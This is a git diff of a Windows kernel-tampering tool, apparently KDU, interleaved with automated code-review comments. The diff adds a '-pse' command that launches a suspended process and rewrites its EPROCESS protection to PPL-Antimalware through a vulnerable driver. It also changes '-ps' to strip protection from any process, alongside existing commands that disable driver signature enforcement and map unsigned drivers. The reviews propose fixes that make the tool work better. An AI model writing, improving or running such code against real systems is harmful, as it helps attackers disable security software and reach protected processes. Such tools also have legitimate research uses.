diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..0baa07b
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,3 @@
+Source/**/output
+.vs
+Source/Hamakaze/shellstager.lst
diff --git a/README.md b/README.md
index eedc948..cbfa5ae 100644
--- a/README.md
+++ b/README.md
@@ -23,12 +23,14 @@ It features:
 ###### KDU -diag
 ###### KDU -prv ProviderID
 ###### KDU -ps ProcessID
+###### KDU -pse Commandline
 ###### KDU -dse value
 ###### KDU -map filename
 * -list - list currently available providers;
 * -diag - run system diagnostic for troubleshooting;
 * -prv - optional, select vulnerability driver provider;
-* -ps - modify process object of given ProcessID;
+* -ps - modify process object of given ProcessID, downgrading any protections;
+* -pse - launch program as ProtectedProcessLight-AntiMalware (PPL);
 * -dse - write user defined value to the system DSE state flags;
 * -map - map driver to the kernel and execute it entry point, this command have dependencies listed below;
 * -scv version - optional, select shellcode version, default 1;
@@ -44,6 +46,7 @@ Example:
 + kdu -prv 6 -scv 3 -drvn edrv -drvr e3600bl -map c:\install\e3600bl.sys
 + kdu -dse 0
 + kdu -dse 6
++ kdu -pse "C:\Windows\System32\notepad.exe C:\TEMP\words.txt"
 Run on Windows 10 20H2*
diff --git a/Source/Hamakaze/main.cpp b/Source/Hamakaze/main.cpp
index 09444e7..5d998fe 100644
--- a/Source/Hamakaze/main.cpp
+++ b/Source/Hamakaze/main.cpp
@@ -23,6 +23,7 @@
 #define CMD_MAP L"-map"
 #define CMD_SCV L"-scv"
 #define CMD_PS L"-ps"
+#define CMD_PSE L"-pse"
 #define CMD_DSE L"-dse"
 #define CMD_LIST L"-list"
 #define CMD_SI L"-diag"
@@ -37,6 +38,7 @@
     "kdu -list - list available providers\r\n"\
     "kdu -diag - run system diagnostic for troubleshooting\r\n"\
     "kdu -prv id - optional, sets provider id to be used with rest of commands, default 0\r\n"\
+    "kdu -pse cmdline - Launch program as PPL\r\n"\
     "kdu -ps pid - disable ProtectedProcess for given pid\r\n"\
     "kdu -dse value - write user defined value to the system DSE state flags\r\n"\
     "kdu -map filename - map driver to the kernel and execute it entry point, this command have dependencies listed below\r\n"\
@@ -46,6 +48,38 @@
 #define T_PRNTDEFAULT "%s\r\n"
+/*
+* KDUProcessPSEObjectSwitch
+*
+* Purpose:
+*
+* Handle -pse switch.
+*
+*/
+INT KDUProcessPSEObjectSwitch(
+    _In_ ULONG HvciEnabled,
+    _In_ ULONG NtBuildNumber,
+    _In_ ULONG ProviderId,
+    _In_ LPWSTR CommandLine
+)
+{
+    INT retVal = 0;
+    KDU_CONTEXT* provContext;
+
+    provContext = KDUProviderCreate(ProviderId,
+        HvciEnabled,
+        NtBuildNumber,
+        KDU_SHELLCODE_NONE,
+        ActionTypeDKOM);
+
+    if (provContext) {
+        retVal = KDURunCommandPPL(provContext, CommandLine);
+        KDUProviderRelease(provContext);
+    }
+
+    return retVal;
+}
+
 /*
 * KDUProcessPSObjectSwitch
 *
@@ -71,7 +105,7 @@ INT KDUProcessPSObjectSwitch(
         ActionTypeDKOM);
     if (provContext) {
-        retVal = KDUControlProcess(provContext, ProcessId);
+        retVal = KDUUnprotectProcess(provContext, ProcessId);
         KDUProviderRelease(provContext);
     }
@@ -429,9 +463,19 @@ INT KDUProcessCommandLine(
             }
         }
+        else if (supGetCommandLineOption(CMD_PSE,
+            TRUE,
+            szParameter,
+            sizeof(szParameter) / sizeof(WCHAR),
+            NULL))
+        {
+            retVal = KDUProcessPSEObjectSwitch(HvciEnabled,
+                NtBuildNumber,
+                providerId,
+                szParameter);
+        }
-        else
-
+        else
         {
             //
             // Check if -ps specified.
             //
@@ -455,6 +499,7 @@ INT KDUProcessCommandLine(
             //
             printf_s(T_PRNTDEFAULT, T_KDUUSAGE);
         }
+        }
     } while (FALSE);
diff --git a/Source/Hamakaze/ps.cpp b/Source/Hamakaze/ps.cpp
index 2d5ea85..5bc44d8 100644
--- a/Source/Hamakaze/ps.cpp
+++ b/Source/Hamakaze/ps.cpp
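Review bot: KDUProcessPSEObjectSwitch is a line-for-line copy of KDUProcessPSObjectSwitch apart from the call inside `if (provContext)`; with a third switch handler of this shape it is worth folding the create-provider / run / KDUProviderRelease sequence into one static helper that takes the action as a callback, so the `KDU_SHELLCODE_NONE` and `ActionTypeDKOM` arguments live in one place. The header comment should also say what the INT result is: as written it is the BOOL from KDURunCommandPPL widened to INT, so the caller sees 0 both when the provider cannot be created and when the launch fails, with no way to tell the two apart. `KDU_CONTEXT* provContext;` is declared a line before it is assigned; `KDU_CONTEXT* provContext = KDUProviderCreate(...)` initializes at first use and matches `INT retVal = 0;` just above it.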
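Review bot: The new `else if (supGetCommandLineOption(CMD_PSE, ...)` block puts its opening brace on a line of its own, while the surrounding code (`if (provContext) {` in the hunk above) keeps the brace on the condition line, and the re-wrapped `else` now opens a block whose closing brace is only added in the next hunk at -455; with three levels of `}` closing in a row, one consistent brace style would make the nesting readable. A one-line comment that the CMD_PSE test is deliberately placed before the CMD_PS test would also help: if supGetCommandLineOption matches by prefix rather than by whole token (not visible here), `-pse` would otherwise be consumed by the `-ps` branch, so the order is load-bearing. KDUProcessCommandLine begins and ends outside the hunk.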
@@ -86,6 +86,85 @@ LPSTR KDUGetProtectionSignerAsString(
     return pStr;
 }
+/*
+* KDUControlProcess
+*
+* Purpose:
+*
+* Start a Process as PPL-Antimalware
+*
+*/
+BOOL KDURunCommandPPL(
+    _In_ PKDU_CONTEXT Context,
+    _In_ LPWSTR CommandLine)
+{
+    BOOL bResult = FALSE;
+    DWORD dwThreadResumeCount = 0;
+
+    STARTUPINFO si;
+    PROCESS_INFORMATION pi;
+
+    ZeroMemory(&si, sizeof(si));
+    si.cb = sizeof(si);
+    ZeroMemory(&pi, sizeof(pi));
+
+    wprintf_s(L"[+] Creating Process '%s'\r\n", CommandLine);
+
+    bResult = CreateProcess(
+        NULL,             // No module name (use command line)
+        CommandLine,      // Command line
+        NULL,             // Process handle not inheritable
+        NULL,             // Thread handle not inheritable
+        FALSE,            // Set handle inheritance to FALSE
+        CREATE_SUSPENDED, // Create Process suspended so we can edit
+                          // its protection level prior to starting
+        NULL,             // Use parent's environment block
+        NULL,             // Use parent's starting directory
+        &si,              // Pointer to STARTUPINFO structure
+        &pi);             // Pointer to PROCESS_INFORMATION structure
+    if (!bResult) {
+        printf("[!] Failed to create process: 0x%x\n", GetLastError());
+        return bResult;
+    }
+    printf_s("[+] Created Process with PID %d\r\n", pi.dwProcessId);
+
+    bResult = KDUControlProcess(Context, pi.dwProcessId, PsProtectedSignerAntimalware, PsProtectedTypeProtectedLight);
+    if (!bResult) {
+        printf("[!] Failed to set process as PPL: 0x%x\n", GetLastError());
+        return bResult;
+    }
+
+    dwThreadResumeCount = ResumeThread(pi.hThread);
+    if (dwThreadResumeCount != 1) {
+        printf("[!] Failed to resume process: %d | 0x%x\n", dwThreadResumeCount, GetLastError());
+        return bResult;
+    }
+
+    // Wait until child process exits.
+    WaitForSingleObject(pi.hProcess, INFINITE);
+
+    // Close process and thread handles.
+    CloseHandle(pi.hProcess);
+    CloseHandle(pi.hThread);
+
+    return bResult;
+}
+
+/*
+* KDUControlProcess
+*
+* Purpose:
+*
+* Modify process object to remove PsProtectedProcess access restrictions.
+*
+*/
+BOOL KDUUnprotectProcess(
+    _In_ PKDU_CONTEXT Context,
+    _In_ ULONG_PTR ProcessId)
+{
+    return KDUControlProcess(Context, ProcessId, PsProtectedSignerNone, PsProtectedTypeNone);
+}
+
 /*
 * KDUControlProcess
 *
@@ -96,7 +175,9 @@ LPSTR KDUGetProtectionSignerAsString(
 */
 BOOL KDUControlProcess(
     _In_ PKDU_CONTEXT Context,
-    _In_ ULONG_PTR ProcessId)
+    _In_ ULONG_PTR ProcessId,
+    _In_ PS_PROTECTED_SIGNER PsProtectionSigner,
+    _In_ PS_PROTECTED_TYPE PsProtectionType)
 {
     BOOL bResult = FALSE;
     ULONG Buffer;
@@ -194,15 +275,15 @@ BOOL KDUControlProcess(
         PsProtection->Type,
         pStr);
-    printf_s("\tPsProtection->Audit: %lu\r\n", PsProtection->Audit);
-
     pStr = KDUGetProtectionSignerAsString(PsProtection->Signer);
     printf_s("\tPsProtection->Signer: %lu (%s)\r\n",
         PsProtection->Signer,
         pStr);
-    PsProtection->Signer = PsProtectedSignerNone;
-    PsProtection->Type = PsProtectedTypeNone;
+    printf_s("\tPsProtection->Audit: %lu\r\n", PsProtection->Audit);
+
+    PsProtection->Signer = PsProtectionSigner;
+    PsProtection->Type = PsProtectionType;
     PsProtection->Audit = 0;
     bResult = Context->Provider->Callbacks.WriteKernelVM(Context->DeviceHandle,
diff --git a/Source/Hamakaze/ps.h b/Source/Hamakaze/ps.h
index c84f63d..b60997c 100644
--- a/Source/Hamakaze/ps.h
+++ b/Source/Hamakaze/ps.h
@@ -30,6 +30,17 @@
 #define EPROCESS_TO_PROTECTION(Object, PsProtectionOffset) ((ULONG_PTR)Object + (ULONG_PTR)PsProtectionOffset)
-BOOL KDUControlProcess(
+BOOL KDUUnprotectProcess(
     _In_ PKDU_CONTEXT Context,
     _In_ ULONG_PTR ProcessId);
+
+BOOL KDURunCommandPPL(
+    _In_ PKDU_CONTEXT Context,
+    _In_ LPWSTR CommandLine);
+
+BOOL KDUControlProcess(
+    _In_ PKDU_CONTEXT Context,
+    _In_ ULONG_PTR ProcessId,
+    _In_ PS_PROTECTED_SIGNER PsProtectionSigner,
+    _In_ PS_PROTECTED_TYPE PsProtectionType);
+
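Review bot: Both failure paths that follow a successful CreateProcess leak the child: when KDUControlProcess fails, or when ResumeThread returns anything other than 1, KDURunCommandPPL returns without closing `pi.hProcess`/`pi.hThread` and leaves a suspended process behind, and in the ResumeThread case `bResult` is still the TRUE returned by KDUControlProcess, so the caller is told the launch succeeded. Restructuring the tail so that every path reaches the CloseHandle calls, terminating the suspended child on failure and clearing bResult, fixes both; whether the handle obtained before the protection change still permits TerminateProcess afterwards is not visible here and should be confirmed. The header comments of both new functions say `* KDUControlProcess`; they should read `* KDURunCommandPPL` and `* KDUUnprotectProcess`. `GetLastError()`, `pi.dwProcessId` and `dwThreadResumeCount` are DWORDs printed with `%x`/`%d`; `%lx`/`%lu` match the type, and this function mixes `printf` with `\n` and `printf_s` with `\r\n` where the rest of the file uses `printf_s` and `\r\n`.
```cpp
    // … unchanged: STARTUPINFO/PROCESS_INFORMATION setup, CreateProcess call and its failure check …
    bResult = KDUControlProcess(Context, pi.dwProcessId, PsProtectedSignerAntimalware, PsProtectedTypeProtectedLight);
    if (!bResult) {
        printf_s("[!] Failed to set process as PPL: 0x%lx\r\n", GetLastError());
        TerminateProcess(pi.hProcess, 0); // do not leave a suspended child behind
    }
    else {
        dwThreadResumeCount = ResumeThread(pi.hThread);
        if (dwThreadResumeCount != 1) {
            printf_s("[!] Failed to resume process: %lu | 0x%lx\r\n", dwThreadResumeCount, GetLastError());
            // NOTE(review): confirm the pre-protection handle still allows this
            TerminateProcess(pi.hProcess, 0);
            bResult = FALSE; // report the failure instead of the earlier TRUE
        }
        else {
            // Wait until child process exits.
            WaitForSingleObject(pi.hProcess, INFINITE);
        }
    }

    // Close process and thread handles on every path.
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);

    return bResult;
```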
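Review bot: KDUControlProcess now writes whatever `PsProtectionSigner`/`PsProtectionType` it is handed, but its header comment above the signature (outside this hunk, and evidently the text that KDUUnprotectProcess's new header was copied from) presumably still describes removing PsProtectedProcess restrictions; it should say that the function rewrites the EPROCESS protection fields to the supplied signer and type and clears Audit, and that KDUUnprotectProcess is the wrapper for the previous remove-protection behaviour. The body of KDUControlProcess continues past the hunk.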